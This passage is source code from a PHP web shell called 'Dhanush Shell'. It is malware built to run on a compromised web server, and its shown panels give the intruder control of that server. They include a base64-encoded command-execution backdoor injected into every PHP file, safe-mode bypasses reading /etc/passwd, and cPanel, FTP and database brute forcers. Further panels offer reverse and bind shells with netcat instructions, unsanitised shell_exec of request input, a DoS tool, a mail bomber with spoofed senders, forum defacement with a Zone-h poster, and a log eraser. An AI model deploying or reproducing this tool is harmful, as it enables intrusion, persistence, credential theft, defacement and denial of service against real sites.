3107 <td style="width:10%;">From</td>
3108 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3109 </tr>
3110
3111 <tr>
3112 <td style="width:20%;">To</td>
3113 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3114 </tr>
3115
3116 <tr>
3117 <td style="width:20%;">Subject</td>
3118 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
3119 </tr>
3120
3121
3122 <tr>
3123 <td colspan="2">
3124 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
3125 </td>
3126 </tr>
3127
3128
3129 <tr>
3130 <td rowspan="2">
3131 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3132 </td>
3133 </tr>
3134 </table>
3135 </form></div>
3136 <?php
3137}
3138// Get Domains
3139else if(isset($_REQUEST["symlinkserver"]))
3140{
3141 ?>
3142 <center><table><tr>
3143 <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
3144 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
3145 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
3146 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
3147 </tr></table></center><br>
3148 <div id="showdata"></div><?php
3149}
3150// Forum Manager
3151else if(isset($_REQUEST["forum"]))
3152{ ?>
3153 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
3154 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
3155 </tr></table></center><br><div id="showdata"></div>
3156 <?php
3157}
3158// Sec info
3159else if(isset($_GET['secinfo']))
3160{ ?><div id=showdata></div>
3161<center><div id="showmydata"></div>
3162</center>
3163<br><center><font color =red size=5>Server security information</font><br><br></center>
3164 <table style="width:100%;border-color:#333333;" border="1">
3165 <tr>
3166 <td style="width:7%;">Curl</td>
3167 <td style="width:7%;">Oracle</td>
3168 <td style="width:7%;">MySQL</td>
3169 <td style="width:7%;">MSSQL</td>
3170 <td style="width:7%;">PostgreSQL</td>
3171 <td style="width:12%;">Open Base Directory</td>
3172 <td style="width:10%;">Safe_Exec_Dir</td>
3173 <td style="width:7%;">PHP Version</td>
3174 <td style="width:7%;">Magic Quotes</td>
3175 <td style="width:7%;">Server Admin</td>
3176 </tr>
3177 <tr>
3178 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3179 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3180 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3181 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3182 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3183 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3184 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3185 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3186 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3187 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3188 </tr>
3189</table><br> <?php
3190 mysecinfo();
3191}
3192// Code Injector
3193
3194else if(isset($_GET['injector']))
3195{
3196 ?>
3197 <form method='POST'>
3198 <table id="margins">
3199 <tr>
3200 <td width="100" class="title">
3201 Directory
3202 </td>
3203 <td>
3204 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3205 </td>
3206
3207 </tr>
3208 <tr>
3209 <td class="title">
3210 Mode
3211 </td>
3212 <td>
3213 <select style="width: 400px;" name="mode" class="box">
3214 <option value="Apender">Apender</option>
3215 <option value="Overwriter">Overwriter</option>
3216 </select>
3217 </td>
3218 </tr>
3219 <tr>
3220 <td class="title">
3221 File Type
3222 </td>
3223 <td>
3224 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3225 </td>
3226 </tr>
3227 <tr>
3228 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3229 </tr>
3230
3231 <tr>
3232 <td colspan="2">
3233 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3234 </td>
3235 </tr>
3236 <tr>
3237 <td rowspan="2">
3238 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3239 </td>
3240 </tr>
3241 </form>
3242 </table><div id="showinject"</div>
3243 <?php
3244}
3245// Bypass
3246else if(isset($_GET["bypass"]))
3247{
3248 ?><center><div id="showbyp"></div></center>
3249 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
3250 <tr>
3251 <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
3252 </tr>
3253 <tr>
3254 <td align="center">
3255 <p>Using copy() function</p>
3256 <form onSubmit="bypassfun('copy',copy.value);return false;">
3257 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3258 </form>
3259 </td>
3260 <td align="center">
3261 <p>Using imap() function</p>
3262 <form onSubmit="bypassfun('imap',imap.value);return false;">
3263 <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
3264 </form>
3265 </td>
3266 </tr>
3267
3268 <tr>
3269 <td align="center">
3270 <p>Using sql() function</p>
3271 <form onSubmit="bypassfun('sql',sql.value);return false;">
3272 <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
3273 </form>
3274 </td>
3275 <td align="center">
3276 <p>Using Curl() function</p>
3277 <form onSubmit="bypassfun('curl',curl.value);return false;">
3278 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3279 </form>
3280 </td>
3281 </tr>
3282
3283 <tr>
3284 <td align="center">
3285 <p>Bypass using include()</p>
3286 <form onSubmit="bypassfun('include',include.value);return false;">
3287 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3288 </form>
3289 </td>
3290 <td align="center">
3291 <p>Using id() function</p>
3292 <form onSubmit="bypassfun('id',id.value);return false;">
3293 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3294 </form>
3295 </td>
3296 </tr>
3297
3298 <tr>
3299 <td align="center">
3300 <p>Using tempnam() function</p>
3301 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3302 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3303 </form>
3304 </td>
3305 <td align="center">
3306 <p>Using symlink() function</p>
3307 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3308 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3309 </form>
3310 </td>
3311 </tr>
3312 <tr>
3313 <td colspan=2 align="center">
3314 <p>Using Bypass function</p>
3315 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3316 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3317 <select id="optiontype" class=sbox>
3318 <option value="tac">tac</option>
3319 <option value="more">more</option>
3320 <option value="less">less</option>
3321 <option value="rev">rev</option>
3322 <option value="xxd">xxd</option>
3323 </select>
3324 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3325 </form>
3326 </td>
3327 </tr>
3328 </table>
3329 </form>
3330 <?php
3331}
3332//fuzzer
3333else if(isset($_GET['fuzz']))
3334{
3335 ?>
3336 <form method="GET">
3337 <table id="margins">
3338 <tr>
3339 <td width="400" class="title">
3340 IP
3341 </td>
3342 <td>
3343 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3344 </td>
3345 </tr>
3346
3347 <tr>
3348 <td class="title">
3349 Port
3350 </td>
3351 <td>
3352 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3353 </td>
3354 </tr>
3355
3356 <tr>
3357 <td class="title">
3358 Timeout
3359 </td>
3360 <td>
3361 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3362 </td>
3363 </tr>
3364
3365
3366 <tr>
3367 <td class="title">
3368 No of times
3369 </td>
3370 <td>
3371 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3372 </td>
3373 </tr>
3374
3375 <tr>
3376 <td class="title">
3377 Message (The message Should be long and it will be multiplied with the value after it)
3378 </td>
3379 <td>
3380 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3381 </td>
3382 <td>
3383 x
3384 </td>
3385 <td width="20">
3386 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3387 </td>
3388 </tr>
3389
3390 <tr>
3391 <td rowspan="2">
3392 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
3393 </td>
3394 </tr>
3395 </table>
3396 </form><div id="showdos"></div>
3397 <?php
3398}
3399// Zone-h Poster
3400 else if(isset($_GET["zone"]))
3401 {
3402 if(!function_exists('curl_version'))
3403 {
3404 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
3405 }
3406 ?>
3407 <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
3408 <form action="<?php echo $self; ?>" method="post">
3409 <table align="center" cellpadding="5" border="0">
3410 <tr>
3411 <td>
3412 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
3413 <tr><td>
3414 <select name="hackmode" class="box">
3415 <option >--------SELECT--------</option>
3416 <option value="1">known vulnerability (i.e. unpatched system)</option>
3417 <option value="2" >undisclosed (new) vulnerability</option>
3418 <option value="3" >configuration / admin. mistake</option>
3419 <option value="4" >brute force attack</option>
3420 <option value="5" >social engineering</option>
3421 <option value="6" >Web Server intrusion</option>
3422 <option value="7" >Web Server external module intrusion</option>
3423 <option value="8" >Mail Server intrusion</option>
3424 <option value="9" >FTP Server intrusion</option>
3425 <option value="10" >SSH Server intrusion</option>
3426 <option value="11" >Telnet Server intrusion</option>
3427 <option value="12" >RPC Server intrusion</option>
3428 <option value="13" >Shares misconfiguration</option>
3429 <option value="14" >Other Server intrusion</option>
3430 <option value="15" >SQL Injection</option>
3431 <option value="16" >URL Poisoning</option>
3432 <option value="17" >File Inclusion</option>
3433 <option value="18" >Other Web Application bug</option>
3434 <option value="19" >Remote administrative panel access bruteforcing</option>
3435 <option value="20" >Remote administrative panel access password guessing</option>
3436 <option value="21" >Remote administrative panel access social engineering</option>
3437 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
3438 <option value="23" >Access credentials through Man In the Middle attack</option>
3439 <option value="24" >Remote service password guessing</option>
3440 <option value="25" >Remote service password bruteforce</option>
3441 <option value="26" >Rerouting after attacking the Firewall</option>
3442 <option value="27" >Rerouting after attacking the Router</option>
3443 <option value="28" >DNS attack through social engineering</option>
3444 <option value="29" >DNS attack through cache poisoning</option>
3445 <option value="30" >Not available</option>
3446 </select>
3447 </td></tr>
3448 <tr><td>
3449 <select name="reason" class="box">
3450 <option >--------SELECT--------</option>
3451 <option value="1" >Heh...just for fun!</option>
3452 <option value="2" >Revenge against that website</option>
3453 <option value="3" >Political reasons</option>
3454 <option value="4" >As a challenge</option>
3455 <option value="5" >I just want to be the best defacer</option>
3456 <option value="6" >Patriotism</option>
3457 <option value="7" >Not available</option>
3458 </select></td></tr>
3459 <tr><td>
3460 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
3461 <tr><td>
3462 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
3463 </form><div id="showzone"></div>
3464 <?php }
3465//DDos
3466 else if(isset($_GET['dos']))
3467 {
3468 ?>
3469 <form method="GET">
3470 <table id="margins">
3471 <tr>
3472 <td width="400" class="title">
3473 IP
3474 </td>
3475 <td>
3476 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3477 </td>
3478 </tr>
3479
3480 <tr>
3481 <td class="title">
3482 Port
3483 </td>
3484 <td>
3485 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3486 </td>
3487 </tr>
3488
3489 <tr>
3490 <td class="title">
3491 Timeout <font >(Time in seconds)</font>
3492 </td>
3493 <td>
3494 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3495 </td>
3496 </tr>
3497 <tr>
3498 <td class="title">
3499 Execution Time <font >(Time in seconds)</font>
3500 </td>
3501 <td>
3502 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3503 </td>
3504 </tr>
3505 <tr>
3506 <td class="title">
3507 No of Bytes per/packet
3508 </td>
3509 <td>
3510 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3511 </td>
3512 </tr>
3513 <tr>
3514 <td rowspan="2">
3515 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
3516 </td>
3517 </tr>
3518 </table>
3519 </form><div id="showdos"></div>
3520 <?php
3521}
3522else if(isset($_GET['mailbomb']))
3523{ ?>
3524 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
3525 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
3526<?php
3527}
3528else if(isset($_GET['tools']))
3529 {
3530 ?>
3531 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
3532 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
3533 <tr>
3534 <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3535 </tr>
3536 <tr>
3537 <td align="center">
3538 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3539 </td>
3540 <td align="center">
3541 <select class="sbox" name='protocol'>
3542 <option value='tcp'>tcp</option>
3543 <option value='udp'>udp</option>
3544 </select>
3545 </td>
3546 <tr>
3547 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
3548 </tr>
3549 </form>
3550 <tr><td colspan=2><div id="showports"></div>
3551 </td></tr></table>
3552
3553 <br>
3554 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
3555 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
3556 <tr>
3557 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3558 </tr>
3559 <tr>
3560 <td>Type : </td>
3561 <td>
3562 <select name="prototype" class="sbox">
3563 <option value="ftp">FTP</option>
3564 <option value="mysql">MYSQL</option>
3565 <option value="postgresql">PostgreSql</option>
3566 </select>
3567 </td>
3568 </tr>
3569 <tr>
3570 <td>Server <b>:</b> Port : </td>
3571 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3572 </tr>
3573 <tr>
3574 <td valign="middle">Brute type : </td>
3575 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
3576 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
3577 Login : <input type="text" name="login" value="root" class="sbox"><br>
3578 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3579 </td>
3580 </tr>
3581 <tr>
3582 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
3583 </tr>
3584 </form><tr><td colspan="2" id="showbrute"></td></tr>
3585 </table>
3586 </center><br>
3587 <?php
3588}
3589else if (isset($_GET["phpc"]))
3590{
3591 ?>
3592 <div id="showresult"></div>
3593 <form name="frm">
3594 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
3595 <br /><br />
3596 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
3597 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
3598 </form>
3599 <?php
3600}
3601else if(isset($_GET["exploit"]))
3602{
3603 if(!isset($_GET["rootexploit"]))
3604 {
3605 ?>
3606 <center>
3607 <form action="<?php echo $self; ?>" method="get" target="_blank">
3608 <input type="hidden" name="exploit">
3609 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
3610 <tr>
3611 <td style="height:60px;">
3612 <font size="4" class=txt>Select Website</font></td><td>
3613 <p><select id="rootexploit" name="rootexploit" class="box">
3614 <option value="exploit-db">Exploit-db</option>
3615 <option value="packetstormsecurity">Packetstormsecurity</option>
3616 <option value="exploitsearch">Exploitsearch</option>
3617 <option value="shodanhq">Shodanhq</option>
3618 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
3619 <input type="submit" value="Search" class="but"></td></tr></table>
3620 </form></center><br>
3621
3622 <?php
3623 }
3624 else
3625 {
3626 //exploit search
3627 $Lversion = php_uname(r);
3628 $OSV = php_uname(s);
3629 if(eregi('Linux',$OSV))
3630 {
3631 $Lversion=substr($Lversion,0,6);
3632 if($_GET['rootexploit'] == "exploit-db")
3633 {
3634 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
3635 }
3636 else if($_GET['rootexploit'] == "packetstormsecurity")
3637 {
3638 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
3639 }
3640 else if($_GET['rootexploit'] == "exploitsearch")
3641 {
3642 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
3643 }
3644 else if($_GET['rootexploit'] == "shodanhq")
3645 {
3646 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
3647 }
3648 }
3649 else
3650 {
3651 $Lversion=substr($Lversion,0,3);
3652 if($_GET['rootexploit'] == "exploit-db")
3653 {
3654 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
3655 }
3656 else if($_GET['rootexploit'] == "packetstormsecurity")
3657 {
3658 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
3659 }
3660 else if($_GET['rootexploit'] == "exploitsearch")
3661 {
3662 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
3663 }
3664 else if($_GET['rootexploit'] == "shodanhq")
3665 {
3666 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
3667 }
3668 }
3669 //End of Exploit search
3670 }
3671}
3672// Connect
3673else if(isset($_REQUEST['connect']))
3674{
3675 ?>
3676 <form action='<?php echo $self; ?>' method='POST' >
3677 <table style="width:50%" align="center" >
3678 <tr>
3679 <th colspan="1" width="50px">Reverse Shell</th>
3680 <th colspan="1" width="50px">Bind Shell</th>
3681 </tr>
3682 <tr>
3683 <td>
3684 <table style="border-spacing: 6px;">
3685 <tr>
3686 <td>IP </td>
3687 <td>
3688 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3689 </td>
3690 </tr>
3691 <tr>
3692 <td>Port </td>
3693 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
3694 </tr>
3695 <tr>
3696 <td style="vertical-align:top;">Use:</td>
3697 <td><select style="width: 95px;" name="lang" class="sbox">
3698 <option value="perl">Perl</option>
3699 <option value="python">Python</option>
3700 <option value="php">PHP</option>
3701 </select>
3702 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
3703 </tr>
3704 </table> </form>
3705 </td>
3706
3707 <td style="vertical-align:top;">
3708 <form method='post' >
3709 <table style="border-spacing: 6px;">
3710 <tr>
3711 <td>Port</td>
3712 <td>
3713 <input style="width: 200px;" class="box" name="port" value="9891" />
3714 </td>
3715 </tr>
3716 <tr>
3717 <td>Password </td>
3718 <td>
3719 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
3720 </td>
3721 <tr>
3722 <td>Using</td>
3723 <td>
3724 <select style="width: 95px;" name="lang" id="lang" class="sbox">
3725 <option value="perl">Perl</option>
3726 <option value="c">C</option>
3727 </select>
3728 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
3729 </tr>
3730 </table>
3731 </td>
3732 </form>
3733 </tr>
3734 <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
3735 </table>
3736
3737 <?php
3738 }
3739
3740else if(isset($_REQUEST['404']))
3741{
3742 ?>
3743 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
3744 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
3745 </tr></table></center><br>
3746 <div id="showdata"></div>
3747 <?php
3748}
3749else if(isset($_GET['about']))
3750 { ?>
3751 <center>
3752 <p><font size=6><u>D h a n u s h</u></font><br>
3753 <font size=5>[--==Coded By Arjun==--]</font>
3754 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
3755
3756 - -- -
3757 -- -- --
3758 -- --
3759 --- ---
3760 ------
3761 ----
3762 ----
3763 ------
3764-------
3765--- --
3766 -- ---
3767 -- -----
3768 --- --- ---
3769 --- --- ---
3770-- --------- --
3771-- ------- --
3772 -- ---- --
3773 -- --- --
3774 -- -- --
3775 --- --- -- ---
3776 ------ ------
3777 ---- ----
3778
3779
3780 </pre></font></div></center>
3781 <font class="txt">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
3782 <?php }
3783else if(isset($_GET['database']))
3784{ ?>
3785 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
3786 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
3787 <tr>
3788 <td colspan="2">Connect To Database</td>
3789 </tr>
3790 <tr>
3791 <td>Server Address :</td>
3792 <td><input type="text" class="box" name="server" value="localhost"></td>
3793 </tr>
3794 <tr>
3795 <td>Username :</td>
3796 <td><input type="text" class="box" name="username" value="root"></td>
3797 </tr>
3798 <tr>
3799 <td>Password:</td>
3800 <td><input type="text" class="box" name="password" value=""></td>
3801 </tr>
3802
3803 <tr>
3804 <td></td>
3805 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
3806 </tr>
3807 </table>
3808 </form>
3809 <div id="showsql"></div>
3810<?php
3811}
3812// Cpanel Cracker
3813 else if(isset($_REQUEST['cpanel']))
3814 {
3815 $cpanel_port="2082";
3816 $connect_timeout=5;
3817 ?>
3818 <center>
3819 <form method=post>
3820 <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
3821 <tr>
3822 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
3823 </tr>
3824 <tr>
3825 <td align=center>User names</td><td align=center>Password</td>
3826 </tr>
3827 <tr>
3828 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
3829 if($os != "Windows")
3830 {
3831 if(@file('/etc/passwd'))
3832 {
3833 $users = file('/etc/passwd');
3834 foreach($users as $user)
3835 {
3836 $user = explode(':', $user);
3837 echo $user[0] . "\n";
3838 }
3839 }
3840 else
3841 {
3842 $temp = "";
3843 $val1 = 0;
3844 $val2 = 1000;
3845 for(;$val1 <= $val2;$val1++)
3846 {
3847 $uid = @posix_getpwuid($val1);
3848 if ($uid)
3849 $temp .= join(':',$uid)."\n";
3850 }
3851
3852 $temp = trim($temp);
3853
3854 if($file5 = fopen("test.txt","w"))
3855 {
3856 fputs($file5,$temp);
3857 fclose($file5);
3858
3859 $file = fopen("test.txt", "r");
3860 while(!feof($file))
3861 {
3862 $s = fgets($file);
3863 $matches = array();
3864 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3865 $matches = str_replace("home/","",$matches[1]);
3866 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3867 continue;
3868 echo $matches;
3869 }
3870 fclose($file);
3871 }
3872 }
3873 }
3874
3875 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
3876 </tr>
3877 <tr>
3878 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
3879 </tr>
3880 <tr>
3881 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
3882 </tr>
3883 <tr>
3884 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
3885 </tr>
3886 </table>
3887 </form>
3888 </center>
3889 <?php
3890}
3891else if(isset($_REQUEST['malattack']))
3892{
3893 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3894 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
3895 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
3896 <div id="showdata"></div>
3897 <?php
3898}
3899else if(isset($_GET["com"]))
3900{
3901 echo "<br>";
3902 ob_start();
3903 eval("phpinfo();");
3904 $b = ob_get_contents();
3905 ob_end_clean();
3906 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
3907 $z = strpos($b,"</body>");
3908 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
3909 echo $s_result;
3910}
3911else if(isset($_GET['execute']))
3912{
3913 $comm = $_GET['execute'];
3914 chdir($_GET['executepath']);
3915 $check = shell_exec($comm);
3916
3917 echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3918
3919 ?>
3920 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
3921 <input type="text" class="box" name="execute">
3922 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
3923 <?php
3924}
3925else if(isset($_GET['mycmd']))
3926{
3927 if($_GET['mycmd']=="logeraser")
3928 {
